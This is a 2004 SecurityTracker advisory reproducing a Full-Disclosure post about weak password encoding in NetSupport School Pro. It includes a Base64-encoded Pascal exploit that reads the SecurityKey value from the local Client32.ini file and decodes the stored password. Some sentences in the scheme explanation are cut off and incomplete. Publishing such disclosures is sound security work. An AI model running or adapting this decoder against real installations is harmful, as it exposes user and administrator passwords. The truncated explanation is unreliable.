SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   NetSupport School Vendors:   NetSupport (Productive Computer Insight)
NetSupport School Pro Weak Password Encoding Lets Local Users Decode Passwords
SecurityTracker Alert ID:  1009556
SecurityTracker URL:  http://securitytracker.com/id/1009556
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 26 2004
Impact:   Disclosure of authentication information
Exploit Included:  Yes  

Description:   A vulnerability was reported in NetSupport School Pro. A local user can decode passwords.

Spiffomatic64 reported that the software uses a simple encoding mechanism that permits local users to readily decode encoded passwords. The passwords are reportedly stored in the 'Client32.ini' file.

A demonstration exploit is provided in the Source Message [it is a Base64 encoded Pascal file].

Impact:   A local user can determine user passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.netsupport-inc.com/nss/netsupport_school_overview.htm (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] NetSupport School Pro: Password encryption weaknesses


This is a multi-part message in MIME format.

------=_NextPart_000_2551_14e2_6534
Content-Type: text/plain; format=flowed


Vendor  : NetSupport
URL     : http://www.netsupport-inc.com/
Version : Invision NetSupport School Pro
Risk    : Password protection weakness

Description: NetSupport School, market leading training tool for the modern 
classroom featuring full student remote control, application & internet 
monitoring, customized student testing and more.

Password protection weakness: The password encryption method is a method 
which is easily reversed. The encryption method is as follows:
The letters are expressed using a hexadecimal type of system. Every letter 
is shown by two characters the first character can be any ascii character 
while the second is in a range from a-p. This works just like hex in that 
ap+1=ba. Its not case sensitive so that also makes it easier for kids to get 
passes. The characters start at EM. So A= EM B=EN and so on. Each letter is 
also added to by the number of letters in front of it. So the crypt of aa= 
EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the 
crypt of each colum though. Here is a reference for the letter a and its 
crypt of each colum EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this 
knowledge and the hex-esque characters, and the addition to each char based 
on the amount of letters in front of it, you can get the password from an 
-3 = FP (according to the hexish system) FP=T so the first letter is T. Take 
and you get ;B add 2 to it (amount of letters in front of it) = ;D then 

Solution: based on my research this program uses a hash type validation 
method, so the quickest and most painless solution would be to use the md5 
routine for passwords.

Credits: Credits go to Drexel University, and Harry Hoffman because if they 
it ;)
As well as Mr. Flynn for teaching me pascal (even though its 20+ years old 
its still my favorite)

Im attaching a exploit to decrypt the password from a machine with the 
software installed

Spiffomatic64
Hacking is an art-form

_________________________________________________________________
All the action. All the drama. Get NCAA hoops coverage at MSN Sports by 
ESPN. http://msn.espn.go.com/index.html?partnersite=espn

------=_NextPart_000_2551_14e2_6534
Content-Type: application/octet-stream; name="EXPLOIT.PAS"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="EXPLOIT.PAS"

cHJvZ3JhbSBuYW1lOw0KdXNlcyBjcnQ7DQp2YXIgaSxqLGxlbmd0aCx4LHks
Y3Jhenk6aW50ZWdlcjsNCiAgICBwYXNzZmlsZTp0ZXh0Ow0KICAgIGxpbmU6
c3RyaW5nOw0KICAgIHBhc3N3b3JkLHA6YXJyYXkgWzEuLjEwMF0gb2YgY2hh
cjsNCiAgICBrbm93bixjb252ZXJ0OmFycmF5IFsxLi4yNiwxLi4zXSBvZiBj
aGFyOw0KICAgIGNoLHRlbXB4LHRlbXB5LGtleTpjaGFyOw0KDQpwcm9jZWR1
cmUgY29udjsNCmJlZ2luDQpjb252ZXJ0WzEsMV06PSdFJzsNCmNvbnZlcnRb
MSwyXTo9J00nOw0KY29udmVydFsxLDNdOj0nQSc7DQpmb3IgaTo9MiB0byAy
NiBkbyBiZWdpbg0KICAgIGlmIGNvbnZlcnRbaS0xLDJdPSdQJyB0aGVuIGJl
Z2luDQogICAgICAgY29udmVydFtpLDFdOj1jaHIob3JkKGNvbnZlcnRbaS0x
LDFdKSsxKTsNCiAgICAgICBjb252ZXJ0W2ksMl06PSdBJzsNCiAgICBlbmQN
CiAgICBlbHNlIGJlZ2luDQogICAgICAgICBjb252ZXJ0W2ksMV06PWNvbnZl
cnRbaS0xLDFdOw0KICAgICAgICAgY29udmVydFtpLDJdOj1jaHIob3JkKGNv
bnZlcnRbaS0xLDJdKSsxKTsNCiAgICBlbmQ7DQogICAgY29udmVydFtpLDNd
Oj1jaHIob3JkKGNvbnZlcnRbaS0xLDNdKSsxKTsNCmVuZDsNCmVuZDsNCg0K
cHJvY2VkdXJlIGhleChhLGI6Y2hhcjsgbnVtOmludGVnZXIpOw0KYmVnaW4N
CmlmIG51bT4wIHRoZW4gYmVnaW4NCmZvciBpOj0xIHRvIG51bSBkbyBiZWdp
bg0KICAgIGlmIGI9J1AnIHRoZW4gYmVnaW4NCiAgICAgICBiOj0nQSc7DQog
ICAgICAgYTo9Y2hyKG9yZChhKSsxKTsNCiAgICBlbmQgZWxzZSBpbmMoYik7
DQplbmQ7DQplbmQ7DQppZiBudW08MCB0aGVuIGJlZ2luDQpmb3IgaTo9LTEg
ZG93bnRvIG51bSBkbyBiZWdpbg0KICAgIGlmIGI9J0EnIHRoZW4gYmVnaW4N
CiAgICAgICBiOj0nUCc7DQogICAgICAgYTo9Y2hyKG9yZChhKS0xKTsNCiAg
ICBlbmQgZWxzZSBkZWMoYik7DQplbmQ7DQplbmQ7DQp0ZW1weDo9YTsNCnRl
bXB5Oj1iOw0KZW5kOw0KDQpmdW5jdGlvbiBjb21wYXJlKGEsYjpjaGFyKTpj
aGFyOw0KYmVnaW4NCmZvciBpOj0xIHRvIDI2IGRvIGJlZ2luDQppZiAoYT1j
b252ZXJ0W2ksMV0pYW5kKGI9Y29udmVydFtpLDJdKSB0aGVuIGNvbXBhcmU6
PWNocihpKzY0KTsNCmVuZDsNCmVuZDsNCg0KZnVuY3Rpb24gZGlmZihhLGIs
YyxkOmNoYXIpOmludGVnZXI7DQp2YXIgbnVtMSxudW0yLG51bTM6aW50ZWdl
cjsNCmJlZ2luDQpudW0xOj1vcmQoYSkqMTYrb3JkKGIpOw0KbnVtMjo9b3Jk
KGMpKjE2K29yZChkKTsNCm51bTI6PW51bTI7DQpkaWZmOj1udW0yLW51bTE7
DQplbmQ7DQoNCg0KQmVnaW4NCntnZXQgdGhlIGhhc2ggZnJvbSBjbGllbnQz
Mi5pbml9DQpjbHJzY3I7DQpXcml0ZWxuKCcgX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fJyk7DQpX
cml0ZWxuKCd8TmV0U3VwcG9ydCBTY2hvb2wgUHJvIFBhc3N3b3JkIGRlY3J5
cHRvciAgICAgICAgICAgICAgICAgfCcpOw0KV3JpdGVsbignfENyZWRpdHMg
Z290bzogRHJleGVsIFVuaXZlcnNpdHksIEhhcnJ5IEhvZmZtYW4sIE1yLiBG
bHlubnwnKTsNCldyaXRlbG4oJ3xhbmQgbXkgd29uZGVyZnVsIGZpYW5jZSBI
YWxsZXkgICAgICAgICAgICAgICAgICAgICAgICAgICB8Jyk7DQpXcml0ZWxu
KCcgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tJyk7DQpXcml0ZWxuKCcnKTsNCiAgIGFzc2lnbiAo
cGFzc2ZpbGUsJ0M6XFByb2dyYX4xXE5ldFN1cH4xXENsaWVudDMyLmluaScp
Ow0KICAgcmVzZXQgKHBhc3NmaWxlKTsNCiAgIGk6PTA7DQogICB3aGlsZSBu
b3QgZW9mKHBhc3NmaWxlKSBkbw0KICAgYmVnaW4NCiAgICAgICAgbGluZTo9
Jyc7DQogICAgICAgIHdoaWxlIG5vdCBFb0xuKHBhc3NmaWxlKSBkbw0KICAg
ICAgICBiZWdpbg0KICAgICAgICAgICAgIFJlYWQocGFzc2ZpbGUsIGNoKTsN
CiAgICAgICAgICAgICBsaW5lOj1saW5lK2NoOw0KICAgICAgICAgICAgIGlm
IGxpbmU9J1NlY3VyaXR5S2V5PScgdGhlbiBiZWdpbg0KICAgICAgICAgICAg
ICAgIHdoaWxlIG5vdCBlb2xuKHBhc3NmaWxlKSBkbw0KICAgICAgICAgICAg
ICAgIGJlZ2luDQogICAgICAgICAgICAgICAgICBpbmMoaSk7DQogICAgICAg
ICAgICAgICAgICByZWFkKHBhc3NmaWxlLGNoKTsNCiAgICAgICAgICAgICAg
ICAgIHBhc3N3b3JkW2ldOj1jaDsNCiAgICAgICAgICAgICAgICBlbmQ7DQog
ICAgICAgICAgICAgICAgbGVuZ3RoOj1pOw0KICAgICAgICAgICAgIGVuZDsN
CiAgICAgICAgZW5kOw0KICAgICAgICByZWFkbG4ocGFzc2ZpbGUsbGluZSk7
DQogICBlbmQ7DQogICB3cml0ZSgnSGFzaDogJyk7DQogICBmb3IgaTo9MSB0
byBsZW5ndGggZG8gd3JpdGUocGFzc3dvcmRbaV0pOw0Kd3JpdGVsbignJyk7
DQp7ZGVjcnlwdCB0aGUgaGFzaH0NCmNvbnY7DQprbm93blsxLDFdOj0nRSc7
DQprbm93blsxLDJdOj0nTSc7DQprbm93blsyLDFdOj0nOSc7DQprbm93blsy
LDJdOj0nTyc7DQprbm93blszLDFdOj0nPic7DQprbm93blszLDJdOj0nQSc7
DQprbm93bls0LDFdOj0nQic7DQprbm93bls0LDJdOj0nQyc7DQprbm93bls1
LDFdOj0nRic7DQprbm93bls1LDJdOj0nRSc7DQprbm93bls2LDFdOj0nOic7
DQprbm93bls2LDJdOj0nRyc7DQprbm93bls3LDFdOj0nPic7DQprbm93bls3
LDJdOj0nSSc7DQprbm93bls4LDFdOj0nQic7DQprbm93bls4LDJdOj0nSyc7
DQprbm93bls5LDFdOj0nRic7DQprbm93bls5LDJdOj0nTSc7DQprbm93blsx
MCwxXTo9JzonOw0Ka25vd25bMTAsMl06PSdPJzsNCmtub3duWzExLDFdOj0n
Pyc7DQprbm93blsxMSwyXTo9J0EnOw0Ka25vd25bMTIsMV06PSdDJzsNCmtu
b3duWzEyLDJdOj0nQyc7DQprbm93blsxMywxXTo9J0cnOw0Ka25vd25bMTMs
Ml06PSdFJzsNCmtub3duWzE0LDFdOj0nOyc7DQprbm93blsxNCwyXTo9J0cn
Ow0Ka25vd25bMTUsMV06PSc/JzsNCmtub3duWzE1LDJdOj0nSSc7DQp7Z2V0
IHRoZSBmaXJzdCBjaGFyfQ0KZm9yIGk6PTEgdG8gcm91bmQobGVuZ3RoLzIp
IGRvIHBbaV06PWNocig2NSk7DQpmb3IgeDo9MSB0byByb3VuZChsZW5ndGgv
MikgZG8gYmVnaW4NCiAgICBjcmF6eTo9MDsNCiAgICBjcmF6eTo9LShyb3Vu
ZChsZW5ndGgvMikpK3g7DQogICAgZm9yIHk6PTEgdG8gcm91bmQobGVuZ3Ro
LzIpIGRvIGNyYXp5Oj1jcmF6eS0ob3JkKHBbeV0pLTY1KTsNCiAgICBoZXgo
cGFzc3dvcmRbeCoyLTFdLHBhc3N3b3JkW3gqMl0sY3JhenkpOw0KICAgIHBb
eF06PWNocihkaWZmKGtub3duW3gsMV0sa25vd25beCwyXSx0ZW1weCx0ZW1w
eSkrNjUpOw0KZW5kOw0Kd3JpdGVsbignJyk7DQp3cml0ZSgnUGFzc3dvcmQ6
ICcpOw0KZm9yIGk6PTEgdG8gcm91bmQobGVuZ3RoLzIpIGRvIGJlZ2luDQog
ICAgd3JpdGUocFtpXSk7DQplbmQ7DQpyZWFka2V5Ow0KDQplbmQu


------=_NextPart_000_2551_14e2_6534--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC